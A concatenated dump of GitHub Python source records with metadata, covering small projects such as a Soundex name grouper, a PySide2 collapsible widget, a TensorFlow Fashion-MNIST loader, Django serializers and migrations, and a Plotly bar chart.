    ``PhoneticAna`` dict, keyed by the Soundex code of the upper-cased name.

    Each downloaded line is also echoed to stdout.
    """
    link = "http://cs.brynmawr.edu/Courses/cs330/spring2017/FemaleNames2.txt"
    f = requests.get(link)
    data = f.text.split('\n')
    for line in data:
        print(line)
        # Guard against the empty string produced by a trailing newline,
        # which would make soundex() fail on line[0].
        if not line:
            continue
        p_key = soundex(line.upper())
        # Bug fix: the original subscript-assigned the *builtin* `dict`
        # type (`dict[p_key] = ...`), which raises a TypeError; the
        # intended accumulator is the module-level PhoneticAna dict.
        if p_key not in PhoneticAna:
            PhoneticAna[p_key] = [line]
        else:
            PhoneticAna[p_key].append(line)
def printDict():
    """Print every Soundex bucket in the module-level ``PhoneticAna`` that
    holds two or more names, as ``<code>\\t<name1,name2,...>``."""
    for k, v in PhoneticAna.items():
        if len(v) >= 2:
            s = ','
            print(k, end='\t')
            print(s.join(v))
#task4()
#printDict()
task13()
| [
"lizzie.siegle@gmail.com"
] | lizzie.siegle@gmail.com |
c218096f89e45e102cb1e2545d15dab1e9bd6169 | ecb5535a106fdedc9bf9513f39fb42f06f1106b8 | /funรงรตesI.py | 01ba3a4cd780a665639dd0e1870e0d52e8140c28 | [
"MIT"
] | permissive | ricardowiest/Exercicios_Python | 27d9351bc3dfcfdefe454886e1c2a46b78fbeeab | bed8e88d142379d5f09216f4a9f5b00f097bb8fb | refs/heads/master | 2022-12-14T07:21:53.260948 | 2020-09-03T17:23:50 | 2020-09-03T17:23:50 | 265,958,499 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 354 | py | def potencia(base, exp):
pot = base ** exp
return pot
a = potencia (5, 6)
print(a)
def soma(n1, n2, n3):
return n1+n2+n3
print(soma(10, 33, 15))
def OpMat(n1, n2):
soma = n1 + n2
return soma, n1 * n2
a, b = OpMat(2, 3)
print(a)
print(b)
from random import randint
def dado():
num = randint(1,6)
print(num)
dado()
| [
"ricardowiest@gmail.com"
] | ricardowiest@gmail.com |
d67f9203a0dc7596348adc5a8fff909435b4c8c0 | a4fec1cb7723bf925ff19b5b1630708f90c60e59 | /UCSB_TS_slowcontrol/collapsible_widget.py | fce3f193b9f8a1c5b624de6b027a5acbe3c9bbb5 | [
"MIT"
] | permissive | RunzZhang/runze | d9e7fed392f5e8314d44454aa7191168ff68aa9f | a2a08c780d2312f031b69bc2d6e4e854e2bdb900 | refs/heads/master | 2023-08-04T13:52:15.409799 | 2023-07-28T18:24:22 | 2023-07-28T18:24:22 | 192,990,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,995 | py | from PySide2 import QtWidgets, QtCore, QtGui
import sys,random
class CollapsibleBox(QtWidgets.QWidget):
def __init__(self, title="", parent=None):
super(CollapsibleBox, self).__init__(parent)
self.toggle_button = QtWidgets.QToolButton(
text=title, checkable=True, checked=False
)
self.toggle_button.setStyleSheet("QToolButton { border: none; }")
self.toggle_button.setToolButtonStyle(
QtCore.Qt.ToolButtonTextBesideIcon
)
self.toggle_button.setArrowType(QtCore.Qt.RightArrow)
self.toggle_button.pressed.connect(self.on_pressed)
self.toggle_animation = QtCore.QParallelAnimationGroup(self)
self.content_area = QtWidgets.QScrollArea(
maximumHeight=0, minimumHeight=0
)
self.content_area.setSizePolicy(
QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed
)
self.content_area.setFrameShape(QtWidgets.QFrame.NoFrame)
lay = QtWidgets.QVBoxLayout(self)
lay.setSpacing(0)
lay.setContentsMargins(0, 0, 0, 0)
lay.addWidget(self.toggle_button)
lay.addWidget(self.content_area)
self.toggle_animation.addAnimation(
QtCore.QPropertyAnimation(self, b"minimumHeight")
)
self.toggle_animation.addAnimation(
QtCore.QPropertyAnimation(self, b"maximumHeight")
)
self.toggle_animation.addAnimation(
QtCore.QPropertyAnimation(self.content_area, b"maximumHeight")
)
@QtCore.Slot()
def on_pressed(self):
checked = self.toggle_button.isChecked()
self.toggle_button.setArrowType(
QtCore.Qt.DownArrow if not checked else QtCore.Qt.RightArrow
)
self.toggle_animation.setDirection(
QtCore.QAbstractAnimation.Forward
if not checked
else QtCore.QAbstractAnimation.Backward
)
self.toggle_animation.start()
def setContentLayout(self, layout):
lay = self.content_area.layout()
del lay
self.content_area.setLayout(layout)
collapsed_height = (
self.sizeHint().height() - self.content_area.maximumHeight()
)
print("c_height", collapsed_height)
content_height = layout.sizeHint().height()
for i in range(self.toggle_animation.animationCount()):
animation = self.toggle_animation.animationAt(i)
animation.setDuration(500)
animation.setStartValue(collapsed_height)
animation.setEndValue(collapsed_height + content_height)
content_animation = self.toggle_animation.animationAt(
self.toggle_animation.animationCount() - 1
)
content_animation.setDuration(500)
content_animation.setStartValue(0)
content_animation.setEndValue(content_height)
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
w = QtWidgets.QMainWindow()
w.setCentralWidget(QtWidgets.QWidget())
dock = QtWidgets.QDockWidget("Collapsible Demo")
w.addDockWidget(QtCore.Qt.LeftDockWidgetArea, dock)
scroll = QtWidgets.QScrollArea()
dock.setWidget(scroll)
content = QtWidgets.QWidget()
scroll.setWidget(content)
scroll.setWidgetResizable(True)
vlay = QtWidgets.QVBoxLayout(content)
for i in range(10):
box = CollapsibleBox("Collapsible Box Header-{}".format(i))
vlay.addWidget(box)
lay = QtWidgets.QVBoxLayout()
for j in range(8):
label = QtWidgets.QLabel("{}".format(j))
color = QtGui.QColor(*[random.randint(0, 255) for _ in range(3)])
label.setStyleSheet(
"background-color: {}; color : white;".format(color.name())
)
label.setAlignment(QtCore.Qt.AlignCenter)
lay.addWidget(label)
box.setContentLayout(lay)
vlay.addStretch()
w.resize(640, 480)
w.show()
sys.exit(app.exec_()) | [
"52052572+RunzZhang@users.noreply.github.com"
] | 52052572+RunzZhang@users.noreply.github.com |
bf010df1f75dd40be74a35d5386c1c0ddd881547 | ac47b880e8dbd66c5ad1da40871c3336a6e67934 | /test/HandTrackingMin.py | 17fa09047fa97845ca59fdd344d0ae1d771eb04a | [] | no_license | sebastien-prudhomme/python | 6e94fd4a0afdc9337c2e082c54630e350d8ce406 | c69073c39d852cea69e095524b50fb807fb14cba | refs/heads/master | 2023-08-04T21:02:57.669194 | 2021-09-09T14:54:17 | 2021-09-09T14:54:17 | 404,734,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py | import cv2
import mediapipe
import time
capture = cv2.VideoCapture(0)
mediapipeHands = mediapipe.solutions.hands
hands = mediapipeHands.Hands()
mediapipeDraw = mediapipe.solutions.drawing_utils
while True:
success, img = capture.read()
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
results = hands.process(imgRGB)
if results.multi_hand_landmarks:
for handLandmarks in results.multi_hand_landmarks:
mediapipeDraw.draw_landmarks(img, handLandmarks, mediapipeHands.HAND_CONNECTIONS)
cv2.imshow("Image", img)
cv2.waitKey(1)
| [
"sebastien.prudhomme@gmail.com"
] | sebastien.prudhomme@gmail.com |
dacde4cdd20fb123305dd593fe4b5940f0a4caf1 | 25b0cca3405c74e4452750292c02e3878376fb6d | /TF2_customized_dataset.py | 8c588c457eefc016105a5cef33edf6d4e5010d00 | [] | no_license | shihezichen/openai | db508c3856e933af3bbfcf1d90fa1202e1f54890 | 82dceaa60f482c9756aec4245e3cea44e010ee79 | refs/heads/master | 2023-03-06T03:02:30.711894 | 2021-02-17T03:05:37 | 2021-02-17T03:05:37 | 266,487,259 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,156 | py | from PIL import Image
import numpy as np
import tensorflow as tf
from tensorflow.keras.preprocessing.image import ImageDataGenerator
import os
BASE_DIR = '/home/arthur/Downloads/MOOC_TF2.1/class4/class4/FASHION_FC/fashion_image_label/'
TRAIN_PATH = BASE_DIR + 'fashion_train_jpg_60000'
TRAIN_LABEL = BASE_DIR + 'fashion_train_jpg_60000.txt'
TEST_PATH = BASE_DIR + 'fashion_test_jpg_10000'
TEST_LABEL = BASE_DIR + 'fashion_test_jpg_10000.txt'
X_TRAIN_SAVE_PATH = BASE_DIR + 'x_train_save.npy'
Y_TRAIN_SAVE_PATH = BASE_DIR + 'y_train_save.npy'
X_TEST_SAVE_PATH = BASE_DIR + 'x_test_save.npy'
Y_TEST_SAVE_PATH = BASE_DIR + 'y_test_save.npy'
# ไปๅๅงๆไปถๅ ่ฝฝ็ๆๆฐๆฎ้
def generate_dataset(path, lable_file):
f = open(lable_file, 'r')
contents = f.readlines()
f.close()
x, y_ = [], []
for content in contents:
img_name, label_value = content.split()
img_path = os.path.join(path, img_name)
img = Image.open(img_path)
# ๅไธบ8ไฝๅฎฝ็ฐๅบฆๅผ็np.arrayๆ ผๅผ
img = np.array(img.convert('L'))
# ๆฐๆฎๅฝไธๅ
img = img / 255.0
x.append(img)
y_.append(label_value)
x = np.array(x)
# ๅไธบnp.array ๅนถๅไธบ64ไฝๆดๆฐ
y_ = np.array(y_).astype(np.int64)
return x, y_
# ่ฝฌ่ฝฝๆฐๆฎ, ๅฆๆๆไฟๅญ, ไปไฟๅญๆไปถๅ ่ฝฝ, ๅฆๅไปๅๅงๆไปถ็ๆๆฐๆฎ้
def load_data():
global TRAIN_PATH, TRAIN_LABEL, TEST_PATH, TEST_LABEL
global X_TRAIN_SAVE_PATH, Y_TRAIN_SAVE_PATH, X_TEST_SAVE_PATH, Y_TEST_SAVE_PATH
is_saved = os.path.exists(X_TRAIN_SAVE_PATH) and os.path.exists(X_TRAIN_SAVE_PATH) \
and os.path.exists(Y_TEST_SAVE_PATH) and os.path.exists(Y_TEST_SAVE_PATH)
if is_saved:
print('-' * 20, 'Load Datasets', '-' * 20)
x_train = np.load(X_TRAIN_SAVE_PATH)
x_test = np.load(X_TEST_SAVE_PATH)
y_train = np.load(Y_TRAIN_SAVE_PATH)
y_test = np.load(Y_TEST_SAVE_PATH)
else:
print('-'*20, 'Generate Datasets', '-'*20)
x_train, y_train = generate_dataset(TRAIN_PATH, TRAIN_LABEL)
x_test, y_test = generate_dataset(TEST_PATH, TEST_LABEL)
print('-'*20, 'Save Datasets', '-'*20)
x_train = np.reshape(x_train, (len(x_train), -1))
x_test = np.reshape(x_test, (len(x_test), -1))
np.save(X_TRAIN_SAVE_PATH, x_train)
np.save(X_TEST_SAVE_PATH, x_test)
np.save(Y_TRAIN_SAVE_PATH, y_train)
np.save(Y_TEST_SAVE_PATH, y_test)
return (x_train, y_train), (x_test, y_test)
if __name__ == '__main__':
(x_train, y_train), (x_test, y_test) = load_data()
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(10, activation='softmax')
])
model.compile(optimizer=tf.keras.optimizers.Adam(),
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False),
metrics=['sparse_categorical_accuracy'])
model.fit(x_train, y_train, batch_size=6000, epochs=5, validation_data=(x_test, y_test), validation_freq=1)
model.summary() | [
"noreply@github.com"
] | shihezichen.noreply@github.com |
f99a0d57cda761ce05b5619805a6cd2e49261cb7 | 716cab8785f70a22ef1dd78a4037f71ed9f16cd7 | /Mystry_Python_Theater/pscore.py | b1f387fa32f203330af21c245be925535b952a6a | [
"MIT"
] | permissive | Phillyclause89/reddit_scripts | ffc29dfd58fc382082273ab4f08b8989d27be582 | bacf7e7061dda2384e4eb60e3cc2d6ff20e28766 | refs/heads/master | 2020-09-27T20:12:16.625171 | 2019-12-13T05:19:10 | 2019-12-13T05:19:10 | 226,600,802 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | def get_player_score():
score = []
for i in range(0, 5):
while True:
try:
s = float(input('Enter golf scores between 78 and 100: '))
if 78 <= s <= 100:
score.append(s)
break
raise ValueError
except ValueError:
print("Invalid Input!")
return score
print(get_player_score())
| [
"45711864+Phillyclause89@users.noreply.github.com"
] | 45711864+Phillyclause89@users.noreply.github.com |
7b79e86bb8bebaacaa408a3761d9797b77af398a | 5665d4d3730964c49f4163382dc080acd6f9edd2 | /grouped-bar-chart.py | 8f99828840ab742a1fc31318dd8da97299689a6c | [] | no_license | victoriast0408/py | 4861298557cd8067d5ef5c5afc75dc9370c91c43 | 892edd571f6d573cdf7ecbd7783b028d37fe52c6 | refs/heads/master | 2020-08-01T07:04:42.514787 | 2019-10-03T12:40:06 | 2019-10-03T12:40:06 | 210,908,071 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 463 | py | import plotly.graph_objects as go
import pandas as pd
bills = pd.read_excel('billsjan2018.xlsx')
fig = go.Figure(data=[
go.Bar(name='Paid cash', x=bills.date, y=bills.paid_cash),
go.Bar(name='Paid card', x=bills.date, y=bills.paid_card),
go.Bar(name='Paid customer card', x=bills.date, y=bills.paid_customer_card),
],
)
# Change the bar mode
fig.update_layout(barmode='group')
fig.show()
if __name__ == '__main__':
app.run_server(debug=True) | [
"victoria@Victorias-MacBook-Air.local"
] | victoria@Victorias-MacBook-Air.local |
a2fa38661bb368c2e9fc95657326e35bd11a12bf | 716e1f229eab5b5087752ebf32c3370a87958798 | /src/program/migrations/0091_eventproposal_tags.py | 5ffe83aaeaa59c036a6fdccafff7d4660093c85a | [
"BSD-3-Clause"
] | permissive | bornhack/bornhack-website | 2e8810e00f7a48a8a7e82f02f66d67edcce6e404 | 767deb7f58429e9162e0c2ef79be9f0f38f37ce1 | refs/heads/master | 2023-08-31T23:31:04.344829 | 2023-08-08T21:59:19 | 2023-08-08T21:59:19 | 43,702,500 | 9 | 43 | BSD-3-Clause | 2023-09-11T09:46:14 | 2015-10-05T17:45:55 | Python | UTF-8 | Python | false | false | 688 | py | # Generated by Django 3.0.3 on 2020-04-21 20:54
import taggit.managers
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("taggit", "0003_taggeditem_add_unique_index"),
("utils", "0004_uuidtaggeditem"),
("program", "0090_event_tags"),
]
operations = [
migrations.AddField(
model_name="eventproposal",
name="tags",
field=taggit.managers.TaggableManager(
help_text="A comma-separated list of tags.",
through="utils.UUIDTaggedItem",
to="taggit.Tag",
verbose_name="Tags",
),
),
]
| [
"noreply@github.com"
] | bornhack.noreply@github.com |
9efe0099db495a6abf8ec4e5391c09aec9b087d3 | 525bdfe2c7d33c901598a501c145df94a3e162b0 | /math_projects/kateryna/bin/constants.py | c2f278310902832628add1fa859476272f1c01ff | [] | no_license | davendiy/ads_course2 | f0a52108f1cab8619b2e6e2c6c4383a1a4615c15 | e44bf2b535b34bc31fb323c20901a77b0b3072f2 | refs/heads/master | 2020-04-06T09:37:12.983564 | 2019-05-09T10:28:22 | 2019-05-09T10:28:22 | 157,349,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,342 | py | #!/usr/bin/env python3
# -*-encoding: utf-8-*-
import logging
DEFAULT_N = 1000 # ะบ-ัั ะตะปะตะผะตะฝััะฒ, ัะบั ะฟะพะฒะตััะฐั ะฟะพััะบ ะทะฐ ัะผะพะฒัะฐะฝะฝัะผ
# ัะธะฟะธ ะตะปะตะผะตะฝััะฒ (ะทะฝะฐัะตะฝะฝั - ะฝะฐะทะฒะธ ัะฐะฑะปะธัั ั ะะ)
KEY_WORD = 'Key_words'
SITE = 'Sites'
LINK = 'Links'
CATEGORIES = 'Categories' # ะฝะฐะทะฒะฐ ัะฐะฑะปะธัั ะบะฐัะตะณะพััะน
DEFAULT_DATABASE = 'data.db' # ัะปัั
ะดะพ ะฑะด ะทะฐ ัะผะพะฒัะฐะฝะฝัะผ
DEFAULT_LOG_GUI = 'parser_gui.log' # ัะฐะนะป ะท ะปะพะณะฐะผะธ ะดะปั ะณัะฐัััะฝะพะณะพ ัะฝัะตััะตะนัั
DEFAULT_LOG_CLIENT = 'parser_client.log' # ัะฐะนะป ะท ะปะพะณะฐะผะธ ะดะปั ะบะปััะฝัะฐ
FORMAT = '%(asctime) -15s %(message)s' # ัะพัะผะฐั ะทะฐะฟะธัั: <ัะฐั> <ะฟะพะฒัะดะพะผะปะตะฝะฝั>
SLEEP = 1 # ััะธะฒะฐะปัััั ัะฝัะตัะฒะฐะปั ะผะพะฝััะพัะธะฝะณั (ั ะณะพะดะธะฝะฐั
)
# ัะฟะธัะบะธ ะฟะพะปัะฒ ะดะปั ะบะพะถะฝะพั ัะฐะฑะปะธัั, ัะบั ะฒัะดะพะฑัะฐะถะฐััััั
LINKS_GUI_FIELDS = ['Link', 'Category', 'Date', 'Information']
SITES_GUI_FIELDS = ['Id', 'Name', 'Link']
KEY_WORDS_GUI_FIELDS = ['Id', 'Word']
# ัะฟะธัะบะธ ะฒััั
ะฟะพะปัะฒ ะดะปั ะบะพะถะฝะพั ัะฐะฑะปะธัั
SITES_DATA_FIELDS = ['Id', 'Name', 'Link', 'Category_id']
KEY_WORDS_DATA_FIELDS = ['Id', 'Word', "Category_id"]
CATEGORIES_FIELDS = ['Id', 'Name']
| [
"davendiy@gmail.com"
] | davendiy@gmail.com |
f8fc74bc77f017e2505969268e870c2dd7ba18e2 | 6ca078e139db445e5f77335a16999a0fbafdb45a | /venv/bin/easy_install | e5382b13b191ac8cbb5a869d6d24fe22051c0e24 | [] | no_license | LeCezar/smalltalk-backend | 8deece76c18d9d40c4cb00ea265de35ab94adeb4 | b7a390f617e18275dbe21e0552851989e9c00970 | refs/heads/master | 2020-04-05T17:20:46.121271 | 2019-03-19T15:53:36 | 2019-03-19T15:53:36 | 157,055,707 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 451 | #!/Users/LeCezar/Desktop/HermesHack/smalltalk-api/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
| [
"lecezar2014@gmail.com"
] | lecezar2014@gmail.com | |
be07e086075aa28837629e953e1b8669b42c2138 | ebc89cb9312cb7e99901936a4fb02aa680cc2ddd | /accounts/serializers.py | 136586c0c2e61e02a33fa278a656086d8b025062 | [] | no_license | yahyaest/PC_Shop_App | d9e4d7d7a45c60f60d73071e40c0c2a35e1b52ca | 670774b32c7306e7efe02f56cbaddde9f55576f7 | refs/heads/master | 2023-08-21T21:40:30.213681 | 2021-10-22T21:37:25 | 2021-10-22T21:37:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 955 | py | from rest_framework import serializers
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
# User Serializer
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id', 'username', 'email')
# Register Serializer
class RegisterSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id', 'username', 'email', 'password')
extra_kwargs = {'password': {'write_only': True}}
def create(self, validated_data):
user = User.objects.create_user(validated_data['username'], validated_data['email'], validated_data['password'])
return user
# Login Serializer
class LoginSerializer(serializers.Serializer):
username = serializers.CharField()
password = serializers.CharField()
def validate(self, data):
user = authenticate(**data)
if user and user.is_active:
return user
raise serializers.ValidationError("Incorrect Credentials")
| [
"machatyahya@gmail.com"
] | machatyahya@gmail.com |
3b03aa2b21533c47a10c5a3314b4853e10823cde | 233b03068cb9ba589869226765c207de9ed7f470 | /prints/pages.py | 309a35bafa2019b0769d57426dccf467be8147dd | [] | no_license | felmola/e_tourism_prints | 4abb8aa48df12325b8aa7c6a8da728b5d44d386a | 91cbfa3bbb22c5e70ea904a0fd663f412c8d223c | refs/heads/master | 2020-09-22T12:13:51.486735 | 2019-12-09T21:07:00 | 2019-12-09T21:07:00 | 225,189,088 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,055 | py | from otree.api import Currency as c, currency_range
from ._builtin import Page, WaitPage
from .models import Constants
class p1_consent(Page):
form_model = "player"
form_fields = ["nombre", "id_number"]
class p2_intro(Page):
pass
class p3_seller_intro(Page):
pass
class p4_seller_decision(Page):
form_model = "player"
form_fields = ["id_number"]
class p5_seller_list(Page):
form_model = "player"
form_fields = ["id_number"]
class p5_1_seller_list(Page):
form_model = "player"
form_fields = ["id_number"]
class p6_buyer_intro(Page):
pass
class p7_buyer_decision(Page):
pass
class p8_buyer_sanction(Page):
pass
class p9_seller_results(Page):
pass
class p10_buyer_results(Page):
pass
class p11_final_results(Page):
pass
page_sequence = [p1_consent, p2_intro, p3_seller_intro, p4_seller_decision, p5_1_seller_list, p5_seller_list,
p6_buyer_intro, p7_buyer_decision, p8_buyer_sanction, p9_seller_results, p10_buyer_results,
p11_final_results]
| [
"43189041+felmola@users.noreply.github.com"
] | 43189041+felmola@users.noreply.github.com |
74d8499dc11c12ab39b85996eb1392b033f30265 | 163ac3e6566c0841367e77bc50620f0f3a5df6cc | /util/model_1.py | 2c9acdff8fa62400afb58f98ea5222ee776dbf68 | [] | no_license | squarefaceyao/SLSTM-TCNN | 1f0a680e7a1f0da7ffbd0e009e33aa34424c2566 | c0926cf73396278d1c9675bd6b35a89560c30033 | refs/heads/main | 2023-08-16T03:00:23.431598 | 2021-10-11T02:02:14 | 2021-10-11T02:02:14 | 372,364,827 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,810 | py | import numpy as np
from tensorflow import keras
from tensorflow.keras import layers
def model_3(units,input_size):
# ้ขๆตไฝฟ็จ็
# pcc = 0.850225693960388
model = keras.Sequential(
[
keras.Input(shape=(input_size,1)),
layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor1"),
layers.MaxPooling1D(pool_size=2,name='Max1'),
layers.Conv1D(10, kernel_size=3, strides=2,activation="relu",padding='same',name='Conv1'),
layers.LSTM(units,return_sequences=True,name='lstm_1'),
layers.UpSampling1D(size=2,name='TC1'),
layers.Flatten(name='flatten'),
layers.Dense(300),
layers.Dropout(0.5),
layers.Dense(input_size),
]
)
return model
def salt(s):
new_array = np.zeros((1,10))
# print('่พๅ
ฅ็็ๆตๅบฆๆฏ{}mM'.format(s))
for i in range(1):
new_array[i] = np.array([0.25]*10)
new_array = new_array[np.newaxis,:]
xx2 = layers.Dense(10)(new_array)
return xx2
def model_4(units,input_size):
xx2 = salt(s=50)
input2 = keras.Input(shape=(input_size,1),name='input')
s = layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor1")(input2)
s = layers.MaxPooling1D(pool_size=2,name='Max1')(s)
s = layers.Conv1D(10, kernel_size=3, strides=2,activation="relu",padding='same',name='Conv1')(s)
# s = layers.Concatenate()([s,xx2])
s = layers.Multiply()([s,xx2])
s = layers.LSTM(units,return_sequences=True,name='lstm_1')(s)
s = layers.UpSampling1D(size=2,name='TC1')(s)
s = layers.Flatten(name='flatten')(s)
s = layers.Dense(300)(s)
s = layers.Dropout(0.5)(s)
output2 = layers.Dense(input_size)(s)
model = keras.Model(inputs=[input2], outputs=[output2])
return model
# def model_3_588To1176(units,input_size):
# # pcc = 0.850225693960388
# model = keras.Sequential(
# [
# keras.Input(shape=(input_size,1)),
# layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor1"),
# layers.MaxPooling1D(pool_size=2,name='Max1'),
# layers.Conv1D(10, kernel_size=3, strides=2,activation="relu",padding='same',name='Conv1'),
# layers.LSTM(units,return_sequences=True,name='lstm_1'),
# layers.UpSampling1D(size=2,name='TC1'),
# layers.Flatten(name='flatten'),
# layers.Dense(300),
# layers.Dropout(0.5),
# layers.Dense(input_size*2),
# ]
# )
# return model
def cnn_model(input_size):
# 9 ๅ็ฑปไฝฟ็จ
r = "relu"
ks = 5
st = 3
a = 0.005
model = keras.Sequential(
[
keras.Input(shape=(input_size,1)),
layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor1"),
layers.Conv1D(10, kernel_size=ks, strides=st,activation=r,padding='same',name='Conv1'),
layers.MaxPooling1D(pool_size=2,name='Max1'),
layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor2"),
layers.Conv1D(10, kernel_size=ks, strides=st,activation=r,padding='same',name='Conv2'),
layers.MaxPooling1D(pool_size=2,name='Max2'),
layers.Flatten(name='flatten'),
layers.Dense(100,kernel_initializer='random_uniform',activation=r,activity_regularizer=keras.regularizers.l2(a),name = "Den1"),
layers.Dropout(0.2),
layers.Dense(9,activation="softmax",name = "Den2"),
]
)
model.compile(loss='categorical_crossentropy',optimizer='Adam', metrics=['accuracy'])
return model
def cnn_model_2(input_size):
# 2ๅ็ฑปไฝฟ็จ
r = "relu"
ks = 5
st = 3
a = 0.005
model = keras.Sequential(
[
keras.Input(shape=(input_size,1)),
layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor1"),
layers.Conv1D(10, kernel_size=ks, strides=st,activation=r,padding='same',name='Conv1'),
layers.MaxPooling1D(pool_size=2,name='Max1'),
# layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor2"),
# layers.Conv1D(10, kernel_size=ks, strides=st,activation=r,padding='same',name='Conv2'),
# layers.MaxPooling1D(pool_size=2,name='Max2'),
# layers.BatchNormalization(beta_initializer='zero',gamma_initializer='one',name = "nor3"),
# layers.Conv1D(10, kernel_size=ks, strides=st,activation=r,padding='same',name='Conv3'),
# layers.MaxPooling1D(pool_size=2,name='Max3'),
# layers.Conv1D(10, kernel_size=3, strides=2,activation="relu",padding='same',name='Conv1'),
# layers.UpSampling1D(size=2,name='TC1'),
layers.Flatten(name='flatten'),
layers.Dense(100,kernel_initializer='random_uniform',activation=r,activity_regularizer=keras.regularizers.l2(a),name = "Den1"),
layers.Dense(50,kernel_initializer='random_uniform',activation=r,activity_regularizer=keras.regularizers.l2(a),name = "Den2"),
layers.Dense(10,kernel_initializer='random_uniform',activation=r,activity_regularizer=keras.regularizers.l2(a),name = "Den3"),
layers.Dropout(0.2),
layers.Dense(2,activation="softmax",name = "Den4"),
]
)
model.compile(loss='categorical_crossentropy',optimizer='Adam', metrics=['accuracy'])
return model
if __name__=='__main__':
units=12
model = model_4(units=units,input_size=588)
# model = cnn_model_2(input_size=1176)
# model = cnn_model(input_size=1176)
# model4 = model_4(12,588)
model.summary()
| [
"squarefaceyao@gmail.com"
] | squarefaceyao@gmail.com |
3011146a8f5e22280470e96e2fc8a5cdcb7a0f0e | 0d54a6cad2c167de84bc7b8ece8175ffafa90a09 | /vertica_python/vertica/messages/backend_messages/load_file.py | b50497a7a374c0436ec0de35723a2fc7c1b782af | [
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hirnimeshrampuresoftware/vertica-python | 34a9e54dba3f6d8e2b72e46b57d93f4ba9f263af | 1b308d151794b2e962e122ead15a21aec4abc3a0 | refs/heads/master | 2023-01-01T01:25:17.565530 | 2020-10-19T10:22:31 | 2020-10-19T10:22:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,101 | py | # Copyright (c) 2020 Micro Focus or one of its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division, absolute_import
from struct import unpack
from ..message import BackendMessage
class LoadFile(BackendMessage):
message_id = b'H'
def __init__(self, data):
BackendMessage.__init__(self)
unpacked = unpack('!{0}sx'.format(data.find(b'\x00')), data)
self.filename = unpacked[0].decode('utf-8')
def __str__(self):
return "LoadFile: name = {}".format(self.filename)
BackendMessage.register(LoadFile)
| [
"noreply@github.com"
] | hirnimeshrampuresoftware.noreply@github.com |
cd1d419f5a3f85addd1204ac4ad6e1913f96620f | ed04021422f82c4a81dea3cabcd68b69392962b5 | /KeyPressModule.py | d876f56f2a70e878699dd9e0d0822b4bcba6a3d9 | [
"Apache-2.0"
] | permissive | kaelfdl/ai-deep-learning-self-driving-raspberry-pi-tesseract | 602108c356428af5c796dcb5df726e0873f7dc86 | 8b6e7e6d0ba203a5b02855b702c7e2483bd6ecb5 | refs/heads/master | 2023-07-04T09:39:18.158604 | 2021-08-03T10:52:33 | 2021-08-03T10:52:33 | 369,888,027 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py | import pygame
def init():
pygame.init()
win = pygame.display.set_mode((100,100))
def get_key(key_name):
flag = False
for event in pygame.event.get():
pass
key_input = pygame.key.get_pressed()
key = getattr(pygame, 'K_{}'.format(key_input))
if key_input[key]:
flag = True
pygame.display.update()
return flag
def main():
if get_key('w'):
print('Key w was pressed')
if __name__ == '__main__':
init()
while(1):
main() | [
"gabryel.flordelis@gmail.com"
] | gabryel.flordelis@gmail.com |
e7df45838c5ad83d0271ecaed881954cab291536 | ad6b4875d7aef06eaa3848d73d65b8ada67cd793 | /210220/while1.py | 79f74fe98e5cddbc94ed699b0f0083e760cfdc39 | [] | no_license | 2020-AL-STUDY/Algorithms | 50510b81705fd0d6eb511de56e496abbc0930099 | 3d75dd149d19412fdf7ea030b0a0babdf4c95d3a | refs/heads/main | 2023-06-07T12:05:10.730007 | 2021-06-28T12:47:16 | 2021-06-28T12:47:16 | 302,847,419 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | a, b = map(int, input().split())
c = []
while a != 0 or b != 0:
c.append(a+b)
a, b = map(int, input().split())
for i in c:
print(i)
| [
"gyfls7748@gmail.com"
] | gyfls7748@gmail.com |
